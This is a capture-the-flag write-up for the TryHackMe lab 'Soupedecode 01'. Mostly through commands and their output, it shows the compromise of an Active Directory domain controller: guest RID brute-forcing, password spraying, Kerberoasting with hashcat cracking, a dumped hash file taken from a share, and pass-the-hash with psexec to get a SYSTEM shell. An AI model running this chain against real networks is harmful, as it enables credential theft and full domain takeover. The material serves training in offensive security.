TryHackMe - Soupedecode 01¶
Introduction¶
Test your AD enumeration skills.
OS: Windows
URL: Soupedecode 01
Level: Easy
A simple Active Directory room to test your enumeration skills.
Description
Soupedecode is an intense and engaging challenge in which players must compromise a domain controller by exploiting Kerberos authentication, navigating through SMB shares, performing password spraying, and utilizing Pass-the-Hash techniques. Prepare to test your skills and strategies in this multifaceted cyber security adventure.
Recon¶
Run a full nmap
port scan to find all open ports.
┌──(kali㉿kali)-[~/THM/Soupedecode01]
└─$ sudo nmap --min-rate=10000 -vv $IP -p-
Not shown: 65518 filtered tcp ports (no-response)
PORT STATE SERVICE REASON
53/tcp open domain syn-ack ttl 124
88/tcp open kerberos-sec syn-ack ttl 124
135/tcp open msrpc syn-ack ttl 124
139/tcp open netbios-ssn syn-ack ttl 124
389/tcp open ldap syn-ack ttl 124
445/tcp open microsoft-ds syn-ack ttl 124
464/tcp open kpasswd5 syn-ack ttl 124
593/tcp open http-rpc-epmap syn-ack ttl 124
636/tcp open ldapssl syn-ack ttl 124
3268/tcp open globalcatLDAP syn-ack ttl 124
3269/tcp open globalcatLDAPssl syn-ack ttl 124
3389/tcp open ms-wbt-server syn-ack ttl 124
9389/tcp open adws syn-ack ttl 124
49664/tcp open unknown syn-ack ttl 124
49667/tcp open unknown syn-ack ttl 124
49673/tcp open unknown syn-ack ttl 124
49707/tcp open unknown syn-ack ttl 124
Many ports associated with Active Directory are open, including: 88/tcp
(Kerberos), 135/tcp
(MSRPC), 139/tcp
(NetBIOS), 389/tcp
(LDAP), 445/tcp
(SMB), and 3389/tcp
(RDP).
Exploitation¶
Shell as ybob317¶
Since this is not an Assumed breach scenario, we will need to find some sort of initial access.
Checking if null sessions / guest authentication is allowed for LDAP / SMB.
┌──(kali㉿kali)-[~/THM/Soupedecode01]
└─$ nxc ldap $IP -u '' -p ''
LDAP 10.201.69.28 389 DC01 [*] Windows Server 2022 Build 20348 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:None) (channel binding:No TLS cert)
LDAP 10.201.69.28 389 DC01 [-] Error in searchRequest -> operationsError: 000004DC: LdapErr: DSID-0C090A58, comment: In order to perform this operation a successful bind must be completed on the connection., data 0, v4f7c
LDAP 10.201.69.28 389 DC01 [+] SOUPEDECODE.LOCAL\:
┌──(kali㉿kali)-[~/THM/Soupedecode01]
└─$ nxc ldap $IP -u 'guest' -p ''
LDAP 10.201.69.28 389 DC01 [*] Windows Server 2022 Build 20348 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:None) (channel binding:No TLS cert)
LDAP 10.201.69.28 389 DC01 [-] Error in searchRequest -> operationsError: 000004DC: LdapErr: DSID-0C090A58, comment: In order to perform this operation a successful bind must be completed on the connection., data 0, v4f7c
LDAP 10.201.69.28 389 DC01 [+] SOUPEDECODE.LOCAL\guest:
┌──(kali㉿kali)-[~/THM/Soupedecode01]
└─$ nxc smb $IP -u '' -p '' --shares
SMB 10.201.69.28 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB 10.201.69.28 445 DC01 [-] SOUPEDECODE.LOCAL\: STATUS_ACCESS_DENIED
SMB 10.201.69.28 445 DC01 [-] Error enumerating shares: Error occurs while reading from remote(104)
┌──(kali㉿kali)-[~/THM/Soupedecode01]
└─$ nxc smb $IP -u 'guest' -p '' --shares
SMB 10.201.69.28 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB 10.201.69.28 445 DC01 [+] SOUPEDECODE.LOCAL\guest:
SMB 10.201.69.28 445 DC01 [*] Enumerated shares
SMB 10.201.69.28 445 DC01 Share Permissions Remark
SMB 10.201.69.28 445 DC01 ----- ----------- ------
SMB 10.201.69.28 445 DC01 ADMIN$ Remote Admin
SMB 10.201.69.28 445 DC01 backup
SMB 10.201.69.28 445 DC01 C$ Default share
SMB 10.201.69.28 445 DC01 IPC$ READ Remote IPC
SMB 10.201.69.28 445 DC01 NETLOGON Logon server share
SMB 10.201.69.28 445 DC01 SYSVOL Logon server share
SMB 10.201.69.28 445 DC01 Users
Guest authentication works for SMB
but we don't have permissions to read the shares. But take note of the shares backup
, Users
share for later.
The guest account doesn't have the privileges to directly list all the domain users, but we can rid-brute
to enumerate users.
┌──(kali㉿kali)-[~/THM/Soupedecode01]
└─$ nxc smb $IP -u 'guest' -p '' --rid-brute | grep -i sidtypeuser | awk '{print $6}' | cut -d\\ -f2 > userlist.txt
┌──(kali㉿kali)-[~/THM/Soupedecode01]
└─$ head -n 10 userlist.txt
Administrator
Guest
krbtgt
DC01$
bmark0
otara1
kleo2
eyara3
pquinn4
jharper5
┌──(kali㉿kali)-[~/THM/Soupedecode01]
└─$ wc -l userlist.txt
1069 userlist.txt
We have a list of 1069 users (Which also includes computer accounts).
Now that we have a user list, let's try to see if any of the accounts are vulnerable to AS-REP Roasting attack.
┌──(kali㉿kali)-[~/THM/Soupedecode01]
└─$ impacket-GetNPUsers SOUPEDECODE.LOCAL/ -usersfile users.txt -outputfile asrep.txt
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Guest doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User DC01$ doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User bmark0 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User otara1 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User kleo2 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User eyara3 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User pquinn4 doesn't have UF_DONT_REQUIRE_PREAUTH set
....
[-] User monitoring_svc doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User admin doesn't have UF_DONT_REQUIRE_PREAUTH set
But there are no hits. Let's try to see if any of the accounts have their password set as their username.
┌──(kali㉿kali)-[~/THM/Soupedecode01]
└─$ nxc ldap $IP -u users.txt -p users.txt --no-bruteforce --continue-on-success
LDAP 10.201.69.28 389 DC01 [*] Windows Server 2022 Build 20348 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:None) (channel binding:No TLS cert)
LDAP 10.201.69.28 389 DC01 [-] SOUPEDECODE.LOCAL\Administrator:Administrator
.....
LDAP 10.201.69.28 389 DC01 [+] SOUPEDECODE.LOCAL\ybob317:ybob317
We have a hit! The user ybob317
has the password set as ybob317
.
ybob317
cannot RDP but has access to the Users
share which we can use to read the flag.
┌──(kali㉿kali)-[~/THM/Soupedecode01]
└─$ nxc smb $IP -u ybob317 -p ybob317 --shares
SMB 10.201.34.69 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB 10.201.34.69 445 DC01 [+] SOUPEDECODE.LOCAL\ybob317:ybob317
SMB 10.201.34.69 445 DC01 [*] Enumerated shares
SMB 10.201.34.69 445 DC01 Share Permissions Remark
SMB 10.201.34.69 445 DC01 ----- ----------- ------
SMB 10.201.34.69 445 DC01 ADMIN$ Remote Admin
SMB 10.201.34.69 445 DC01 backup
SMB 10.201.34.69 445 DC01 C$ Default share
SMB 10.201.34.69 445 DC01 IPC$ READ Remote IPC
SMB 10.201.34.69 445 DC01 NETLOGON READ Logon server share
SMB 10.201.34.69 445 DC01 SYSVOL READ Logon server share
SMB 10.201.34.69 445 DC01 Users READ
┌──(kali㉿kali)-[~/THM/Soupedecode01]
└─$ impacket-smbclient ybob317:ybob317@$IP
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
Type help for list of commands
# use Users
# ls
drw-rw-rw- 0 Thu Jul 4 18:48:22 2024 .
drw-rw-rw- 0 Wed Jun 18 18:14:47 2025 ..
drw-rw-rw- 0 Thu Jul 4 18:49:01 2024 admin
drw-rw-rw- 0 Fri Jul 25 13:45:10 2025 Administrator
drw-rw-rw- 0 Sat Jun 15 23:49:29 2024 All Users
drw-rw-rw- 0 Sat Jun 15 22:51:08 2024 Default
drw-rw-rw- 0 Sat Jun 15 23:49:29 2024 Default User
-rw-rw-rw- 174 Sat Jun 15 23:46:32 2024 desktop.ini
drw-rw-rw- 0 Sat Jun 15 13:54:32 2024 Public
drw-rw-rw- 0 Mon Jun 17 13:24:32 2024 ybob317
#
# cat ybob317/desktop/user.txt
281**REDACTED**
Shell as file_svc¶
Now that we have valid domain creds, we can enumerate a lot of things.
- AS-REP Roasting (incase you missed any domain users)
- Keberosting
- Pillaging shares for sensitive files / files containing credentials
- Collecting bloodhound data to see if our user has any interesting privileges
- Dumping the entire ldap data to look for any user attributes that may contain credentials (Description, Notes, info, etc...)
- etc...
┌──(kali㉿kali)-[~/THM/Soupedecode01]
└─$ nxc ldap $IP -u ybob317 -p ybob317 --kerberoast kerb.hash
LDAP 10.201.34.69 389 DC01 [*] Windows Server 2022 Build 20348 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:None) (channel binding:No TLS cert)
LDAP 10.201.34.69 389 DC01 [+] SOUPEDECODE.LOCAL\ybob317:ybob317
LDAP 10.201.34.69 389 DC01 [*] Skipping disabled account: krbtgt
LDAP 10.201.34.69 389 DC01 [*] Total of records returned 5
LDAP 10.201.34.69 389 DC01 [*] sAMAccountName: file_svc, memberOf: [], pwdLastSet: 2024-06-17 13:32:23.726085, lastLogon: <never>
LDAP 10.201.34.69 389 DC01 $krb5tgs$23$*file_svc$SOUPEDECODE.LOCAL$SOUPEDECODE.LOCAL\file_svc*$[...SNIP...]
LDAP 10.201.34.69 389 DC01 [*] sAMAccountName: firewall_svc, memberOf: [], pwdLastSet: 2024-06-17 13:28:32.710125, lastLogon: <never>
LDAP 10.201.34.69 389 DC01 $krb5tgs$23$*firewall_svc$SOUPEDECODE.LOCAL$SOUPEDECODE.LOCAL\firewall_svc*$[...SNIP...]
LDAP 10.201.34.69 389 DC01 [*] sAMAccountName: backup_svc, memberOf: [], pwdLastSet: 2024-06-17 13:28:49.476511, lastLogon: <never>
LDAP 10.201.34.69 389 DC01 $krb5tgs$23$*backup_svc$SOUPEDECODE.LOCAL$SOUPEDECODE.LOCAL\backup_svc*$[...SNIP...]
LDAP 10.201.34.69 389 DC01 [*] sAMAccountName: web_svc, memberOf: [], pwdLastSet: 2024-06-17 13:29:04.569417, lastLogon: <never>
LDAP 10.201.34.69 389 DC01 $krb5tgs$23$*web_svc$SOUPEDECODE.LOCAL$SOUPEDECODE.LOCAL\web_svc*$[...SNIP...]
LDAP 10.201.34.69 389 DC01 [*] sAMAccountName: monitoring_svc, memberOf: [], pwdLastSet: 2024-06-17 13:29:18.511871, lastLogon: <never>
LDAP 10.201.34.69 389 DC01 $krb5tgs$23$*monitoring_svc$SOUPEDECODE.LOCAL$SOUPEDECODE.LOCAL\monitoring_svc*$[...SNIP...]
We have a few service accounts that are vulnerable to Kerberoasting. Let's crack them.
┌──(kali㉿kali)-[~/THM/Soupedecode01]
└─$ hashcat kerb.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting in autodetect mode
....
$krb5tgs$23$*file_svc$SOUPEDECODE.LOCAL$SOUPEDECODE.LOCAL\file_svc*$[...SNIP...]:Pass**REDACTED**
Approaching final keyspace - workload adjusted.
Session..........: hashcat
Status...........: Exhausted
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: kerb.hash
Time.Started.....: Fri Aug 1 16:58:45 2025 (30 secs)
Time.Estimated...: Fri Aug 1 16:59:15 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 4692.0 kH/s (0.95ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 2/10 (20.00%) Digests (total), 2/10 (20.00%) Digests (new), 2/10 (20.00%) Salts
Progress.........: 143443850/143443850 (100.00%)
Rejected.........: 0/143443850 (0.00%)
Restore.Point....: 14344385/14344385 (100.00%)
Restore.Sub.#1...: Salt:9 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: $HEX[206b72697374656e616e6e65] -> $HEX[042a0337c2a156616d6f732103]
Hardware.Mon.#1..: Util: 34%
Started: Fri Aug 1 16:58:42 2025
Stopped: Fri Aug 1 16:59:17 2025
Shell as System¶
We got the creds for file_svc
user, so we restart our enumeration process again checking for any new file shares that we might have access to.
┌──(kali㉿kali)-[~/THM/Soupedecode01]
└─$ nxc smb $IP -u file_svc -p 'Pass**REDACTED**' --shares
SMB 10.201.34.69 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB 10.201.34.69 445 DC01 [+] SOUPEDECODE.LOCAL\file_svc:Pass**REDACTED**
SMB 10.201.34.69 445 DC01 [*] Enumerated shares
SMB 10.201.34.69 445 DC01 Share Permissions Remark
SMB 10.201.34.69 445 DC01 ----- ----------- ------
SMB 10.201.34.69 445 DC01 ADMIN$ Remote Admin
SMB 10.201.34.69 445 DC01 backup READ
SMB 10.201.34.69 445 DC01 C$ Default share
SMB 10.201.34.69 445 DC01 IPC$ READ Remote IPC
SMB 10.201.34.69 445 DC01 NETLOGON READ Logon server share
SMB 10.201.34.69 445 DC01 SYSVOL READ Logon server share
SMB 10.201.34.69 445 DC01 Users
We have access to the backup
share. Let's see if we can find any sensitive files.
┌──(kali㉿kali)-[~/THM/Soupedecode01]
└─$ impacket-smbclient file_svc:'Pass**REDACTED**'@$IP
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
Type help for list of commands
# use backup
# ls
drw-rw-rw- 0 Mon Jun 17 13:41:17 2024 .
drw-rw-rw- 0 Fri Jul 25 13:51:20 2025 ..
-rw-rw-rw- 892 Mon Jun 17 13:41:23 2024 backup_extract.txt
# get backup_extract.txt
# exit
┌──(kali㉿kali)-[~/THM/Soupedecode01]
└─$ cat backup_extract.txt
WebServer$:2119:aad3b435b51404eeaad3b435b51404ee:c47b45f5d4df5a494bd19f13e14f7902:::
DatabaseServer$:2120:aad3b435b51404eeaad3b435b51404ee:406b424c7b483a42458bf6f545c936f7:::
CitrixServer$:2122:aad3b435b51404eeaad3b435b51404ee:48fc7eca9af236d7849273990f6c5117:::
FileServer$:2065:aad3b435b51404eeaad3b435b51404ee:e41d**REDACTED**:::
MailServer$:2124:aad3b435b51404eeaad3b435b51404ee:46a4655f18def136b3bfab7b0b4e70e3:::
BackupServer$:2125:aad3b435b51404eeaad3b435b51404ee:46a4655f18def136b3bfab7b0b4e70e3:::
ApplicationServer$:2126:aad3b435b51404eeaad3b435b51404ee:8cd90ac6cba6dde9d8038b068c17e9f5:::
PrintServer$:2127:aad3b435b51404eeaad3b435b51404ee:b8a38c432ac59ed00b2a373f4f050d28:::
ProxyServer$:2128:aad3b435b51404eeaad3b435b51404ee:4e3f0bb3e5b6e3e662611b1a87988881:::
MonitoringServer$:2129:aad3b435b51404eeaad3b435b51404ee:48fc7eca9af236d7849273990f6c5117:::
We get a file named backup_extract.txt
which seems to contain a hashdump of machine accounts.
Let's try to see if any of the creds are actually valid.
# generate a user and hash file list so it's easier to use with nxc
┌──(kali㉿kali)-[~/THM/Soupedecode01]
└─$ cat backup_extract.txt | cut -d: -f1 > backup_users.txt
┌──(kali㉿kali)-[~/THM/Soupedecode01]
└─$ cat backup_extract.txt | cut -d: -f4 > backup_hashes.txt
┌──(kali㉿kali)-[~/THM/Soupedecode01]
└─$ nxc smb $IP -u backup_users.txt -H backup_hashes.txt --no-brute
SMB 10.201.34.69 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB 10.201.34.69 445 DC01 [-] SOUPEDECODE.LOCAL\WebServer$:c47b45f5d4df5a494bd19f13e14f7902 STATUS_LOGON_FAILURE
SMB 10.201.34.69 445 DC01 [-] SOUPEDECODE.LOCAL\DatabaseServer$:406b424c7b483a42458bf6f545c936f7 STATUS_LOGON_FAILURE
SMB 10.201.34.69 445 DC01 [-] SOUPEDECODE.LOCAL\CitrixServer$:48fc7eca9af236d7849273990f6c5117 STATUS_LOGON_FAILURE
SMB 10.201.34.69 445 DC01 [+] SOUPEDECODE.LOCAL\FileServer$:e41da**REDACTED** (Pwn3d!)
We have valid creds for FileServer$
machine account and the (Pwn3d!)
indicates that we have admin access to the machine.
Let's try to get a shell on the machine as SYSTEM
using impacket-psexec
and read the root flag.
┌──(kali㉿kali)-[~/THM/Soupedecode01]
└─$ impacket-psexec 'FileServer$'@$IP -hashes :e41da7e79a**REDACTED**
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Requesting shares on 10.201.34.69.....
[*] Found writable share ADMIN$
[*] Uploading file lSJpbWWT.exe
[*] Opening SVCManager on 10.201.34.69.....
[*] Creating service RntB on 10.201.34.69.....
[*] Starting service RntB.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.20348.587]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32> type C:\Users\Administrator\Desktop\root.txt
**REDACTED**
It looks like the FileServer$
machine account was added to the Enterprise Admins
group which allowed us to use psexec to get a shell as SYSTEM
.
┌──(kali㉿kali)-[~/THM/Soupedecode01]
└─$ nxc ldap $IP -u ybob317 -p ybob317 --query '(&(objectclass=user)(sAMAccountName=FileServer$))' ""
LDAP 10.201.34.69 389 DC01 [*] Windows Server 2022 Build 20348 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:None) (channel binding:No TLS cert)
LDAP 10.201.34.69 389 DC01 [+] SOUPEDECODE.LOCAL\ybob317:ybob317
LDAP 10.201.34.69 389 DC01 [+] Response for object: CN=FileServer,CN=Computers,DC=SOUPEDECODE,DC=LOCAL
LDAP 10.201.34.69 389 DC01 objectClass top
LDAP 10.201.34.69 389 DC01 person
LDAP 10.201.34.69 389 DC01 organizationalPerson
LDAP 10.201.34.69 389 DC01 user
LDAP 10.201.34.69 389 DC01 computer
LDAP 10.201.34.69 389 DC01 cn FileServer
LDAP 10.201.34.69 389 DC01 distinguishedName CN=FileServer,CN=Computers,DC=SOUPEDECODE,DC=LOCAL
LDAP 10.201.34.69 389 DC01 instanceType 4
LDAP 10.201.34.69 389 DC01 whenCreated 20240615200611.0Z
LDAP 10.201.34.69 389 DC01 whenChanged 20250801211100.0Z
LDAP 10.201.34.69 389 DC01 uSNCreated 22204
LDAP 10.201.34.69 389 DC01 memberOf CN=Enterprise Admins,CN=Users,DC=SOUPEDECODE,DC=LOCAL